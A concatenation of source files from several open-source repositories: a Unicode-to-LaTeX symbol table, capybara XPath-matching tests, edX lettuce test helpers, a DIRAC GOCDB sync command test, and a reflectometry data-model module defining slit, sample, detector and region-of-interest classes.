u"\uD6FD":"\\mathsl{\\Beta}",
u"\uD6FE":"\\mathsl{\\Gamma}",
u"\uD6FF":"\\mathsl{\\Delta}",
u"\uD700":"\\mathsl{\\Epsilon}",
u"\uD701":"\\mathsl{\\Zeta}",
u"\uD702":"\\mathsl{\\Eta}",
u"\uD703":"\\mathsl{\\Theta}",
u"\uD704":"\\mathsl{\\Iota}",
u"\uD705":"\\mathsl{\\Kappa}",
u"\uD706":"\\mathsl{\\Lambda}",
u"\uD709":"\\mathsl{\\Xi}",
u"\uD70B":"\\mathsl{\\Pi}",
u"\uD70C":"\\mathsl{\\Rho}",
u"\uD70D":"\\mathsl{\\varsigma}",
u"\uD70E":"\\mathsl{\\Sigma}",
u"\uD70F":"\\mathsl{\\Tau}",
u"\uD710":"\\mathsl{\\Upsilon}",
u"\uD711":"\\mathsl{\\Phi}",
u"\uD712":"\\mathsl{\\Chi}",
u"\uD713":"\\mathsl{\\Psi}",
u"\uD714":"\\mathsl{\\Omega}",
u"\uD715":"\\partial",
u"\uD716":"\\in",
u"\uD717":"\\mathsl{\\vartheta}",
u"\uD718":"\\mathsl{\\varkappa}",
u"\uD719":"\\mathsl{\\phi}",
u"\uD71A":"\\mathsl{\\varrho}",
u"\uD71B":"\\mathsl{\\varpi}",
u"\uD71C":"\\mathbit{\\Alpha}",
u"\uD71D":"\\mathbit{\\Beta}",
u"\uD71E":"\\mathbit{\\Gamma}",
u"\uD71F":"\\mathbit{\\Delta}",
u"\uD720":"\\mathbit{\\Epsilon}",
u"\uD721":"\\mathbit{\\Zeta}",
u"\uD722":"\\mathbit{\\Eta}",
u"\uD723":"\\mathbit{\\Theta}",
u"\uD724":"\\mathbit{\\Iota}",
u"\uD725":"\\mathbit{\\Kappa}",
u"\uD726":"\\mathbit{\\Lambda}",
u"\uD729":"\\mathbit{\\Xi}",
u"\uD72B":"\\mathbit{\\Pi}",
u"\uD72C":"\\mathbit{\\Rho}",
u"\uD72D":"\\mathbit{O}",
u"\uD72E":"\\mathbit{\\Sigma}",
u"\uD72F":"\\mathbit{\\Tau}",
u"\uD730":"\\mathbit{\\Upsilon}",
u"\uD731":"\\mathbit{\\Phi}",
u"\uD732":"\\mathbit{\\Chi}",
u"\uD733":"\\mathbit{\\Psi}",
u"\uD734":"\\mathbit{\\Omega}",
u"\uD735":"\\mathbit{\\nabla}",
u"\uD736":"\\mathbit{\\Alpha}",
u"\uD737":"\\mathbit{\\Beta}",
u"\uD738":"\\mathbit{\\Gamma}",
u"\uD739":"\\mathbit{\\Delta}",
u"\uD73A":"\\mathbit{\\Epsilon}",
u"\uD73B":"\\mathbit{\\Zeta}",
u"\uD73C":"\\mathbit{\\Eta}",
u"\uD73D":"\\mathbit{\\Theta}",
u"\uD73E":"\\mathbit{\\Iota}",
u"\uD73F":"\\mathbit{\\Kappa}",
u"\uD740":"\\mathbit{\\Lambda}",
u"\uD743":"\\mathbit{\\Xi}",
u"\uD745":"\\mathbit{\\Pi}",
u"\uD746":"\\mathbit{\\Rho}",
u"\uD747":"\\mathbit{\\varsigma}",
u"\uD748":"\\mathbit{\\Sigma}",
u"\uD749":"\\mathbit{\\Tau}",
u"\uD74A":"\\mathbit{\\Upsilon}",
u"\uD74B":"\\mathbit{\\Phi}",
u"\uD74C":"\\mathbit{\\Chi}",
u"\uD74D":"\\mathbit{\\Psi}",
u"\uD74E":"\\mathbit{\\Omega}",
u"\uD74F":"\\partial",
u"\uD750":"\\in",
u"\uD751":"\\mathbit{\\vartheta}",
u"\uD752":"\\mathbit{\\varkappa}",
u"\uD753":"\\mathbit{\\phi}",
u"\uD754":"\\mathbit{\\varrho}",
u"\uD755":"\\mathbit{\\varpi}",
u"\uD756":"\\mathsfbf{\\Alpha}",
u"\uD757":"\\mathsfbf{\\Beta}",
u"\uD758":"\\mathsfbf{\\Gamma}",
u"\uD759":"\\mathsfbf{\\Delta}",
u"\uD75A":"\\mathsfbf{\\Epsilon}",
u"\uD75B":"\\mathsfbf{\\Zeta}",
u"\uD75C":"\\mathsfbf{\\Eta}",
u"\uD75D":"\\mathsfbf{\\Theta}",
u"\uD75E":"\\mathsfbf{\\Iota}",
u"\uD75F":"\\mathsfbf{\\Kappa}",
u"\uD760":"\\mathsfbf{\\Lambda}",
u"\uD763":"\\mathsfbf{\\Xi}",
u"\uD765":"\\mathsfbf{\\Pi}",
u"\uD766":"\\mathsfbf{\\Rho}",
u"\uD767":"\\mathsfbf{\\vartheta}",
u"\uD768":"\\mathsfbf{\\Sigma}",
u"\uD769":"\\mathsfbf{\\Tau}",
u"\uD76A":"\\mathsfbf{\\Upsilon}",
u"\uD76B":"\\mathsfbf{\\Phi}",
u"\uD76C":"\\mathsfbf{\\Chi}",
u"\uD76D":"\\mathsfbf{\\Psi}",
u"\uD76E":"\\mathsfbf{\\Omega}",
u"\uD76F":"\\mathsfbf{\\nabla}",
u"\uD770":"\\mathsfbf{\\Alpha}",
u"\uD771":"\\mathsfbf{\\Beta}",
u"\uD772":"\\mathsfbf{\\Gamma}",
u"\uD773":"\\mathsfbf{\\Delta}",
u"\uD774":"\\mathsfbf{\\Epsilon}",
u"\uD775":"\\mathsfbf{\\Zeta}",
u"\uD776":"\\mathsfbf{\\Eta}",
u"\uD777":"\\mathsfbf{\\Theta}",
u"\uD778":"\\mathsfbf{\\Iota}",
u"\uD779":"\\mathsfbf{\\Kappa}",
u"\uD77A":"\\mathsfbf{\\Lambda}",
u"\uD77D":"\\mathsfbf{\\Xi}",
u"\uD77F":"\\mathsfbf{\\Pi}",
u"\uD780":"\\mathsfbf{\\Rho}",
u"\uD781":"\\mathsfbf{\\varsigma}",
u"\uD782":"\\mathsfbf{\\Sigma}",
u"\uD783":"\\mathsfbf{\\Tau}",
u"\uD784":"\\mathsfbf{\\Upsilon}",
u"\uD785":"\\mathsfbf{\\Phi}",
u"\uD786":"\\mathsfbf{\\Chi}",
u"\uD787":"\\mathsfbf{\\Psi}",
u"\uD788":"\\mathsfbf{\\Omega}",
u"\uD789":"\\partial",
u"\uD78A":"\\in",
u"\uD78B":"\\mathsfbf{\\vartheta}",
u"\uD78C":"\\mathsfbf{\\varkappa}",
u"\uD78D":"\\mathsfbf{\\phi}",
u"\uD78E":"\\mathsfbf{\\varrho}",
u"\uD78F":"\\mathsfbf{\\varpi}",
u"\uD790":"\\mathsfbfsl{\\Alpha}",
u"\uD791":"\\mathsfbfsl{\\Beta}",
u"\uD792":"\\mathsfbfsl{\\Gamma}",
u"\uD793":"\\mathsfbfsl{\\Delta}",
u"\uD794":"\\mathsfbfsl{\\Epsilon}",
u"\uD795":"\\mathsfbfsl{\\Zeta}",
u"\uD796":"\\mathsfbfsl{\\Eta}",
u"\uD797":"\\mathsfbfsl{\\vartheta}",
u"\uD798":"\\mathsfbfsl{\\Iota}",
u"\uD799":"\\mathsfbfsl{\\Kappa}",
u"\uD79A":"\\mathsfbfsl{\\Lambda}",
u"\uD79D":"\\mathsfbfsl{\\Xi}",
u"\uD79F":"\\mathsfbfsl{\\Pi}",
u"\uD7A0":"\\mathsfbfsl{\\Rho}",
u"\uD7A1":"\\mathsfbfsl{\\vartheta}",
u"\uD7A2":"\\mathsfbfsl{\\Sigma}",
u"\uD7A3":"\\mathsfbfsl{\\Tau}",
u"\uD7A4":"\\mathsfbfsl{\\Upsilon}",
u"\uD7A5":"\\mathsfbfsl{\\Phi}",
u"\uD7A6":"\\mathsfbfsl{\\Chi}",
u"\uD7A7":"\\mathsfbfsl{\\Psi}",
u"\uD7A8":"\\mathsfbfsl{\\Omega}",
u"\uD7A9":"\\mathsfbfsl{\\nabla}",
u"\uD7AA":"\\mathsfbfsl{\\Alpha}",
u"\uD7AB":"\\mathsfbfsl{\\Beta}",
u"\uD7AC":"\\mathsfbfsl{\\Gamma}",
u"\uD7AD":"\\mathsfbfsl{\\Delta}",
u"\uD7AE":"\\mathsfbfsl{\\Epsilon}",
u"\uD7AF":"\\mathsfbfsl{\\Zeta}",
u"\uD7B0":"\\mathsfbfsl{\\Eta}",
u"\uD7B1":"\\mathsfbfsl{\\vartheta}",
u"\uD7B2":"\\mathsfbfsl{\\Iota}",
u"\uD7B3":"\\mathsfbfsl{\\Kappa}",
u"\uD7B4":"\\mathsfbfsl{\\Lambda}",
u"\uD7B7":"\\mathsfbfsl{\\Xi}",
u"\uD7B9":"\\mathsfbfsl{\\Pi}",
u"\uD7BA":"\\mathsfbfsl{\\Rho}",
u"\uD7BB":"\\mathsfbfsl{\\varsigma}",
u"\uD7BC":"\\mathsfbfsl{\\Sigma}",
u"\uD7BD":"\\mathsfbfsl{\\Tau}",
u"\uD7BE":"\\mathsfbfsl{\\Upsilon}",
u"\uD7BF":"\\mathsfbfsl{\\Phi}",
u"\uD7C0":"\\mathsfbfsl{\\Chi}",
u"\uD7C1":"\\mathsfbfsl{\\Psi}",
u"\uD7C2":"\\mathsfbfsl{\\Omega}",
u"\uD7C3":"\\partial",
u"\uD7C4":"\\in",
u"\uD7C5":"\\mathsfbfsl{\\vartheta}",
u"\uD7C6":"\\mathsfbfsl{\\varkappa}",
u"\uD7C7":"\\mathsfbfsl{\\phi}",
u"\uD7C8":"\\mathsfbfsl{\\varrho}",
u"\uD7C9":"\\mathsfbfsl{\\varpi}",
u"\uD7CE":"\\mathbf{0}",
u"\uD7CF":"\\mathbf{1}",
u"\uD7D0":"\\mathbf{2}",
u"\uD7D1":"\\mathbf{3}",
u"\uD7D2":"\\mathbf{4}",
u"\uD7D3":"\\mathbf{5}",
u"\uD7D4":"\\mathbf{6}",
u"\uD7D5":"\\mathbf{7}",
u"\uD7D6":"\\mathbf{8}",
u"\uD7D7":"\\mathbf{9}",
u"\uD7D8":"\\mathbb{0}",
u"\uD7D9":"\\mathbb{1}",
u"\uD7DA":"\\mathbb{2}",
u"\uD7DB":"\\mathbb{3}",
u"\uD7DC":"\\mathbb{4}",
u"\uD7DD":"\\mathbb{5}",
u"\uD7DE":"\\mathbb{6}",
u"\uD7DF":"\\mathbb{7}",
u"\uD7E0":"\\mathbb{8}",
u"\uD7E1":"\\mathbb{9}",
u"\uD7E2":"\\mathsf{0}",
u"\uD7E3":"\\mathsf{1}",
u"\uD7E4":"\\mathsf{2}",
u"\uD7E5":"\\mathsf{3}",
u"\uD7E6":"\\mathsf{4}",
u"\uD7E7":"\\mathsf{5}",
u"\uD7E8":"\\mathsf{6}",
u"\uD7E9":"\\mathsf{7}",
u"\uD7EA":"\\mathsf{8}",
u"\uD7EB":"\\mathsf{9}",
u"\uD7EC":"\\mathsfbf{0}",
u"\uD7ED":"\\mathsfbf{1}",
u"\uD7EE":"\\mathsfbf{2}",
u"\uD7EF":"\\mathsfbf{3}",
u"\uD7F0":"\\mathsfbf{4}",
u"\uD7F1":"\\mathsfbf{5}",
u"\uD7F2":"\\mathsfbf{6}",
u"\uD7F3":"\\mathsfbf{7}",
u"\uD7F4":"\\mathsfbf{8}",
u"\uD7F5":"\\mathsfbf{9}",
u"\uD7F6":"\\mathtt{0}",
u"\uD7F7":"\\mathtt{1}",
u"\uD7F8":"\\mathtt{2}",
u"\uD7F9":"\\mathtt{3}",
u"\uD7FA":"\\mathtt{4}",
u"\uD7FB":"\\mathtt{5}",
u"\uD7FC":"\\mathtt{6}",
u"\uD7FD":"\\mathtt{7}",
u"\uD7FE":"\\mathtt{8}",
u"\uD7FF":"\\mathtt{9}",
u"\uFB00":"ff",
u"\uFB01":"fi",
u"\uFB02":"fl",
u"\uFB03":"ffi",
u"\uFB04":"ffl",
}
|
jingnanshi/pyTable2LaTeX
|
src/symbols.py
|
Python
|
mit
| 63,240
|
[
"Bowtie"
] |
e95ec77ef60d6145ec3bc617301b862341140254c2e35212371c86976546bef1
|
import pytest
import capybara
class MatchesXPathTestCase:
    """Shared fixtures for the matches_xpath / not_match_xpath test suites."""
    @pytest.fixture(autouse=True)
    def setup_session(self, session):
        # Every test in the subclasses starts from the same fixture page.
        session.visit("/with_html")
    @pytest.fixture
    def element(self, session):
        # Element under test; the XPath assertions in the subclasses suggest
        # it is a <span class="number"> containing "42" -- inferred from the
        # selectors used below, not verified here.
        return session.find("css", "span", text="42")
class TestMatchesXPath(MatchesXPathTestCase):
    """``matches_xpath`` is truthy exactly when the XPath selects the element."""

    def test_is_true_if_the_given_selector_matches_the_element(self, element):
        for xpath in ("//span", "//span[@class='number']"):
            assert element.matches_xpath(xpath)

    def test_is_false_if_the_given_selector_does_not_match(self, element):
        for xpath in ("//abbr", "//div", "//span[@class='not_a_number']"):
            assert not element.matches_xpath(xpath)

    def test_uses_xpath_even_if_default_selector_is_css(self, element):
        # The argument must be treated as XPath regardless of the default.
        capybara.default_selector = "css"
        for xpath in ("//span[@class='not_a_number']", "//div[@class='number']"):
            assert not element.matches_xpath(xpath)
class TestNotMatchXPath(MatchesXPathTestCase):
    """``not_match_xpath`` is the negation of ``matches_xpath``."""

    def test_is_false_if_the_given_selector_matches_the_element(self, element):
        for xpath in ("//span", "//span[@class='number']"):
            assert not element.not_match_xpath(xpath)

    def test_is_true_if_the_given_selector_does_not_match(self, element):
        for xpath in ("//abbr", "//div", "//span[@class='not_a_number']"):
            assert element.not_match_xpath(xpath)

    def test_uses_xpath_even_if_default_selector_is_css(self, element):
        # The argument must be treated as XPath regardless of the default.
        capybara.default_selector = "css"
        for xpath in ("//span[@class='not_a_number']", "//div[@class='number']"):
            assert element.not_match_xpath(xpath)
|
elliterate/capybara.py
|
capybara/tests/session/element/test_matches_xpath.py
|
Python
|
mit
| 1,769
|
[
"VisIt"
] |
bef9d8cf91010e94fd88fa149cd7defb364b0878732bd52195a5e288c3f25593
|
# pylint: disable=C0111
# pylint: disable=W0621
import urllib
from lettuce import world
from django.contrib.auth.models import User, Group
from student.models import CourseEnrollment
from xmodule.modulestore.django import editable_modulestore
from xmodule.contentstore.django import contentstore
@world.absorb
def create_user(uname, password):
    """
    Create, register and activate a user with the given credentials.

    No-op if a user with that username already exists.
    """
    # exists() issues a cheap EXISTS query instead of fetching every
    # matching row just to take len() of the result.
    if User.objects.filter(username=uname).exists():
        return
    portal_user = world.UserFactory.build(username=uname, email=uname + '@edx.org')
    portal_user.set_password(password)
    portal_user.save()
    registration = world.RegistrationFactory(user=portal_user)
    registration.register(portal_user)
    registration.activate()
    world.UserProfileFactory(user=portal_user)
@world.absorb
def log_in(username='robot', password='test', email='robot@edx.org', name="Robot"):
    """
    Use the auto_auth feature to programmatically log the user in
    """
    credentials = {
        'username': username,
        'password': password,
        'email': email,
        'full_name': name,
    }
    world.visit('/auto_auth' + "?" + urllib.urlencode(credentials))
    # Save the user info in the world scenario_dict for use in the tests
    world.scenario_dict['USER'] = User.objects.get(username=username)
@world.absorb
def register_by_course_id(course_id, username='robot', password='test', is_staff=False):
    """
    Create the named user if necessary and enroll them in course_id.

    Note: the is_staff flag makes the user global staff - that is, an edX
    employee - not a course staff.  See courseware.tests.factories for
    StaffFactory and InstructorFactory.
    """
    create_user(username, password)
    user = User.objects.get(username=username)
    if is_staff:
        user.is_staff = True
        user.save()
    CourseEnrollment.enroll(user, course_id)
@world.absorb
def enroll_user(user, course_id):
    """Activate the user's registration, then enroll them in the course."""
    registration = world.RegistrationFactory(user=user)
    registration.register(user)
    registration.activate()
    CourseEnrollment.enroll(user, course_id)
@world.absorb
def clear_courses():
    """Drop all module-store and content-store data (destructive)."""
    # Flush and initialize the module store
    # Note that if your test module gets in some weird state
    # (though it shouldn't), do this manually
    # from the bash shell to drop it:
    # $ mongo test_xmodule --eval "db.dropDatabase()"
    editable_modulestore().collection.drop()
    contentstore().fs_files.drop()
|
hkawasaki/kawasaki-aio8-1
|
common/djangoapps/terrain/course_helpers.py
|
Python
|
agpl-3.0
| 2,426
|
[
"VisIt"
] |
8db2f6a6616716981fa1e6b989ad3be4d8ee0d347a3300403e857e3158e3efa2
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# """
# Test_RSS_Command_GOCDBSyncCommand
# """
__RCSID__ = '$Id$'
from datetime import datetime, timedelta
import mock
from DIRAC import gLogger, S_OK
from DIRAC.ResourceStatusSystem.Command.GOCDBSyncCommand import GOCDBSyncCommand
# Module-level mocks shared by all tests: stand-ins for the GOCDB and
# ResourceManagement clients so no network/database access is needed.
mock_GOCDBClient = mock.MagicMock()
mock_RMClient = mock.MagicMock()
mock_RMClient.addOrModifyDowntimeCache.return_value = S_OK()
"""
Setup
"""
gLogger.setLevel('DEBUG')
def test_instantiate():
    """Instantiating GOCDBSyncCommand yields an object of that class."""
    cmd = GOCDBSyncCommand()
    assert cmd.__class__.__name__ == 'GOCDBSyncCommand'
def test_init():
    """The constructor fills args/apis defaults and records supplied clients."""
    bare = GOCDBSyncCommand()
    assert bare.args == {'onlyCache': False}
    assert bare.apis == {}

    with_client = GOCDBSyncCommand(clients={'GOCDBClient': mock_GOCDBClient})
    assert with_client.args == {'onlyCache': False}
    assert with_client.apis == {'GOCDBClient': mock_GOCDBClient}
def test_doNew():
    """ tests the doNew method
    """
    # Freeze "now" once so all relative offsets in the fixture agree.
    now = datetime.utcnow()
    # Two cached downtime rows, shaped like a ResourceManagementClient
    # result: tuple-of-tuples plus a parallel 'Columns' name list.
    resFromDB = {'OK': True,
                 'Value': ((now - timedelta(hours=2),
                            'dummy.host1.dummy',
                            'https://a1.domain',
                            now + timedelta(hours=3),
                            'dummy.host.dummy',
                            now - timedelta(hours=2),
                            'maintenance',
                            'OUTAGE',
                            now,
                            'Resource',
                            'APEL'
                            ),
                           (now - timedelta(hours=2),
                            'dummy.host2.dummy',
                            'https://a2.domain',
                            now + timedelta(hours=3),
                            'dummy.host2.dummy',
                            now - timedelta(hours=2),
                            'maintenance',
                            'OUTAGE',
                            now,
                            'Resource',
                            'CREAM'
                            )
                           ),
                 'Columns': ['StartDate', 'DowntimeID', 'Link', 'EndDate', 'Name', 'DateEffective', 'Description',
                             'Severity', 'LastCheckTime', 'Element', 'GOCDBServiceType']}
    # Canned GOCDB XML answer covering only host1's downtime.
    resFromGOCDBclient = {'OK': True, 'Value':
                          '''<?xml version="1.0" encoding="UTF-8"?>
<results>
<DOWNTIME ID="dummy.host1.dummy" PRIMARY_KEY="dummy.host1.dummy" CLASSIFICATION="SCHEDULED">
<PRIMARY_KEY>dummy.host1.dummy</PRIMARY_KEY>
<HOSTNAME>dummy.host1.dummy</HOSTNAME>
<SERVICE_TYPE>gLExec</SERVICE_TYPE>
<ENDPOINT>dummy.host1.dummy</ENDPOINT>
<HOSTED_BY>dummy.host1.dummy</HOSTED_BY>
<GOCDB_PORTAL_URL>https://a1.domain</GOCDB_PORTAL_URL>
<AFFECTED_ENDPOINTS/>
<SEVERITY>OUTAGE</SEVERITY>
<DESCRIPTION>Network connectivity problems</DESCRIPTION>
<INSERT_DATE>1473460659</INSERT_DATE>
<START_DATE>1473547200</START_DATE>
<END_DATE>1473677747</END_DATE>
<FORMATED_START_DATE>2016-09-10 22:40</FORMATED_START_DATE>
<FORMATED_END_DATE>2016-09-12 10:55</FORMATED_END_DATE>
</DOWNTIME>
</results>'''}
    # Wire the mocks so doNew() sees the fixtures above.
    mock_RMClient.selectDowntimeCache.return_value = resFromDB
    mock_GOCDBClient.getHostnameDowntime.return_value = resFromGOCDBclient
    command = GOCDBSyncCommand({'ResourceManagementClient': mock_RMClient,
                                'GOCDBClient': mock_GOCDBClient})
    res = command.doNew()
    # NOTE(review): the test pins the current (failing) result of doNew()
    # with these fixtures -- confirm this is the intended contract.
    assert res['OK'] is False
|
yujikato/DIRAC
|
src/DIRAC/ResourceStatusSystem/Command/test/Test_RSS_Command_GOCDBSyncCommand.py
|
Python
|
gpl-3.0
| 3,991
|
[
"DIRAC"
] |
0d4b909a64f1724d5846ef775d902ec0511724cd769e7c49e9b9fad3832c12b3
|
# This program is public domain
"""
Reflectometry data representation.
Need to support collections of data from TOF, monochromatic
and white beam instruments.
Conceptually each data point is a tuple::
incident angles (sample tilt and rotation)
reflected angles (polar angle of detector pixel)
slit distances and openings
detector pixel distance and size
incident/reflected polarization
wavelength distribution
measurement start and duration
monitor and detector counts
sample environment
Reflectometers are either vertical or horizontal geometry.
For vertical geometry (sample surface parallel to gravity),
x refers to horizontal slit opening and horizontal detector
pixels. For horizontal geometry (sample surface perpendicular
to gravity) x refers to vertical slit opening and vertical
detector pixels. Other than gravitational corrections to
resolution and detector pixels, the analysis for the two
instrument types should be identical.
Monochromatic reflectometers have a single wavelength per
measurement but scan the measurements. Time-of-flight and
polychromatic reflectometers have multiple wavelengths per
measurement but perform one measurement. In either case
a dataset consists of detector frames versus Q. We will
ignore scans on multichannel instruments since these can
be treated as combined independent scans with non-overlapping
data, and handled outside this data structure.
Data points are gathered together into measurements. Some
files may have multiple measurements, and other measurements
may be spread over multiple files. Files may be local or
remote, ascii or binary. It is up to the individual format
reader to map measurements to files.
Different polarization states will be treated as belonging
to different measurements. These will need to be aligned
before polarization correction can be performed. Multiple
measurements may occur on the same detector. In this
case each measurement should have a separate 'region of
interest' to isolate it from the others, presenting a virtual
detector to the reduction and analysis program.
Some information about the measurements may be missing
from the files, or recorded incorrectly. Changes and
additions to the metadata must be recorded in any reduced
data file format, along with a list of transformations
that went into the reduction.
See notes in properties.py regarding dated values.
"""
__all__ = ['ReflData']
import datetime
import weakref
import numpy
from numpy import inf, pi, sin, cos, arcsin, arctan2, sqrt
from qxqz import ABL_to_QxQz
# TODO: attribute documentation and units should be integrated with the
# TODO: definition of the attributes. Value attributes should support
# TODO: unit conversion
class Slit(object):
    """
    Define a slit for the instrument, needed for correct resolution
    calculations and for ab initio footprint calculations.

    distance (inf millimetre)
        Distance from sample.  Positive values are after the sample,
        negative values before it, along the beam path.
    offset (4 x 0 millimetre)
        Offset of the individual slit blades relative to *distance*.
        For vertical geometry this is left, right, up, down; for
        horizontal geometry up, down, left, right.  offset + distance
        gives each blade's distance from the sample.
    shape (shape='rectangular')
        'rectangular' for slit blades, 'circular' for an aperture.
    x (n x inf millimetre)
        Opening in the primary direction (horizontal for vertical
        geometry, vertical for horizontal geometry).  A constant for
        fixed slits, or length n for n measurements.
    y (n x inf millimetre)
        Opening in the secondary direction; constant or length n.
    """
    properties = ['distance','offset','x','y','shape']
    distance = inf
    offset = [0.] * 4
    x = inf
    y = inf
    shape = "rectangular"  # rectangular or circular

    def __init__(self, **kw):
        _set(self, kw)

    def __str__(self):
        return _str(self)
class Sample(object):
    """
    Define the sample geometry.  Size and shape are needed for correct
    resolution calculations and for ab initio footprint calculations;
    angles are needed for correct calculation of Q; rotation and
    environment are for display to the user.

    description ("")
        Sample description, if available from the file.
    width (inf millimetre)
        Extent in the primary direction; for fixed slits the beam
        footprint shrinks with angle in this direction.
    length (inf millimetre)
        Extent in the secondary direction; footprint is independent of
        angle in this direction.
    thickness (inf millimetre)
        Thickness of the sample.
    substrate_sld (10^-6 Angstrom^-2)
        Substrate scattering length density for Fresnel reflectivity
        plots; defaults to silicon.
    shape ('rectangular')
        'circular' or 'rectangular'.
    angle_x (n x 0 degree)
        Angle between beam and sample surface in the primary direction;
        constant or length n for n measurements.
    angle_y (n x 0 degree)
        Angle between beam and sample surface in the secondary
        direction ("tilt" on some instruments); constant or length n.
    rotation (n x 0 degree)
        Orientation of a patterned array on the surface; not used in
        reduction but reported to the user and carried through to the
        reduced file for off-specular analysis.
    environment ({})
        Sample environment data; see the Environment class.
    """
    properties = ['description','width','length','thickness','shape',
                  'angle_x','angle_y','rotation','substrate_sld']
    description = ''
    width = inf        # mm
    length = inf       # mm
    thickness = inf    # mm
    shape = 'rectangular'  # rectangular or circular or irregular
    angle_x = 0        # degree
    angle_y = 0        # degree
    rotation = 0       # degree
    substrate_sld = 2.07   # inv A (silicon substrate for neutrons)

    def __init__(self, **kw):
        # environment is per-instance; it must exist before _set so a
        # caller may supply it as a keyword.
        self.environment = {}
        _set(self, kw)

    def __str__(self):
        return _str(self)
class Environment(object):
    """
    Placeholder for sample environment data attached to measurements,
    e.g. temperature (kelvin), pressure (pascal), relative_humidity (%),
    electric_field (V/m), magnetic_field (tesla), stress_field (pascal).

    Data may be a constant, one value per scan point, or a series of
    values and times; average/minimum/maximum statistics may be
    available, both overall and per scan point.

    Directional measurements carry a polar and azimuthal angle, either
    constant for the scan or stored with each magnitude.

    Fields:
        name -- name of the environment variable
        units -- units to report on graphs
        average, minimum, maximum -- statistics on all measurements
        value -- magnitude of the measurement
        start -- start time for log
        time (seconds) -- measurement time relative to start
        polar_angle, azimuthal_angle (degree) -- orientation relative
            to the sample surface: x is polar 0 azimuthal 0, y is
            polar 90 azimuthal 0, z is azimuthal 90.
    """
    pass
class Beamstop(object):
    """
    Define the geometry of the beamstop.  This is used by the
    detector class to compute the shadow of the beamstop on the
    detector.  The beamstop is assumed to be centered on the
    direct beam regardless of the position of the detector.

    distance (0 millimetre)
        Distance from sample to beamstop.  Note: this will need to
        be subtracted from the distance from detector to beamstop.
    shape ('rectangular')
        Shape is 'circular' or 'rectangular'
    width (0 millimetre)
        Width of the beamstop in the primary direction.  For circular
        beamstops, this is the diameter.
    length (0 millimetre)
        Width of the beamstop in the secondary direction.  For circular
        beamstops, this is the diameter.
    offset (2 x millimetre)
        Offset of the beamstop from the center of the beam.
    ispresent (False)
        True if beamstop is present in the experiment.
    """
    # BUG FIX: the original properties list named 'x_offset'/'y_offset',
    # which are not attributes of this class (the offset is stored as a
    # single [x, y] pair), so _str() raised AttributeError.  List the
    # real attribute instead.
    properties = ['distance','width','length','shape',
                  'offset','ispresent']
    distance = 0           # mm
    width = 0              # mm
    length = 0             # mm
    shape = 'rectangular'  # rectangular or circular
    offset = [0,0]         # mm
    ispresent = False

    def __init__(self, **kw):
        _set(self, kw)

    def __str__(self):
        return _str(self)
class Detector(object):
    """
    Define the detector properties.  Note that this defines a virtual
    detector: the real detector may have e.g. multiple beam paths
    incident upon it, and be split into two virtual detectors when
    the file is loaded.

    Direction x refers to the primary direction and y to the secondary
    direction.  For vertical geometry the primary direction is in the
    horizontal plane and the secondary in the vertical plane; for
    horizontal geometry these are reversed.

    Geometry
    ========
    dims (2 x pixels)
        Dimensions [nx,ny]: [1,1] for pencil detectors, [nx,1] for
        position sensitive detectors, [nx,ny] for area detectors.
    distance (millimetre)
        Distance from the sample to the detector.
    size (2 x millimetre)
        Detector size [x,y].  Default is 1 mm x 1 mm.
    solid_angle (2 x radian)
        Detector solid angle [x,y], calculated from distance and size.
    center (2 x millimetre)
        Location of the center pixel [x,y] relative to the detector arm.
    widths_x (nx x millimetre)
    widths_y (ny x millimetre)
        Pixel widths in x and y, assuming no space between the pixels.
    angle_x (n x degree)
    angle_y (n x degree)
        Angle of the detector arm relative to the main beam; constant
        or of length n for the number of measurements in the scan.
    rotation (degree)
        Rotation of the detector relative to the beam; affects how
        vertical integration in the region of interest is calculated.

    Efficiency
    ==========
    efficiency (nx x ny %)
        Relative efficiency of each pixel, or 1 if unknown.
    saturation (k [%, counts/second, uncertainty])
        Efficiency correction per count rate: a tuple of three vectors
        (efficiency, uncertainty, count rate).  Below the lowest count
        rate the detector is considered 100% efficient; beyond the
        highest it is considered saturated.

    Measurement
    ===========
    wavelength (k nanometre)
        Wavelength for each channel.
    wavelength_resolution (k %)
        1-sigma gaussian approximation dL, expressed as 100*dL/L.
    time_of_flight (k+1 millisecond)
        Time boundaries for time-of-flight measurement.
    counts (nx x ny x k counts OR n x nx x ny counts)
        Detector counts.

    Runtime Facilities
    ==================
    loadcounts (function returning counts)
        Counts can be assigned using::

            data.detector.counts = weakref.ref(counts)

        When the counts field is accessed the reference is resolved; if
        it yields None, loadcounts is called and cached as a weak
        reference.  Large datasets can thus be purged from memory when
        not in active use.
    """
    properties = ["dims",'distance','size','center','widths_x','widths_y',
                  'angle_x','angle_y','rotation','efficiency','saturation',
                  'wavelength','time_of_flight','counts']
    dims = [1,1]           # i,j
    distance = None        # mm
    size = [1,1]           # mm
    center = [0,0]         # mm
    widths_x = 1           # mm
    widths_y = 1           # mm
    angle_x = 0            # degree
    angle_y = 0            # degree
    rotation = 0           # degree
    efficiency = 1         # proportion
    saturation = inf       # counts/sec
    wavelength = 1         # angstrom
    time_of_flight = None  # ms

    def _solid_angle(self):
        """Detector solid angle [x,y] (radians)"""
        return 2*arctan2(numpy.asarray(self.size)/2.,self.distance)
    solid_angle = property(_solid_angle,doc=_solid_angle.__doc__)

    # Raw counts are cached behind a weak reference and loaded on demand;
    # rebinned/integrated counts for the region of interest stay in memory.
    def loadcounts(self):
        """Load the data"""
        # py3-compatible raise; the original used py2-only "raise E, msg"
        # syntax, which is a SyntaxError under Python 3.
        raise NotImplementedError(
            "Data format must set detector.counts or detector.loadcounts")

    def _pcounts(self):
        """Simulated empty weak reference"""
        return None

    def _getcounts(self):
        counts = self._pcounts()
        if counts is None:
            counts = self.loadcounts()
            self._pcounts = weakref.ref(counts)
        return counts

    def _setcounts(self, value):
        # File formats which are small do not need to use weak references;
        # for a uniform interface (call to dereference) a direct value is
        # wrapped in a strong closure.
        if isinstance(value,weakref.ref):
            self._pcounts = value
        else:
            def static(): return value
            self._pcounts = static

    def _delcounts(self):
        # BUG FIX: the original assigned a *local* variable "_pcounts",
        # which was a silent no-op; reset the instance cache so the next
        # access reloads via loadcounts().
        self._pcounts = lambda: None

    counts = property(_getcounts,_setcounts,_delcounts)

    def __init__(self, **kw): _set(self,kw)
    def __str__(self): return _str(self)
class ROI(object):
    """
    Detector region of interest.

    A rectangular region of the detector used for defining frames.
    For example, a single detector seeing both polarization states
    (via transmission and reflection off a supermirror) can be split
    into two virtual detectors.

    xlo, xhi (pixels)
    ylo, yhi (pixels)
    """
    properties = ['xlo','xhi','ylo','yhi']
    xlo = None
    xhi = None
    ylo = None
    yhi = None

    def __init__(self, **kw):
        _set(self, kw)

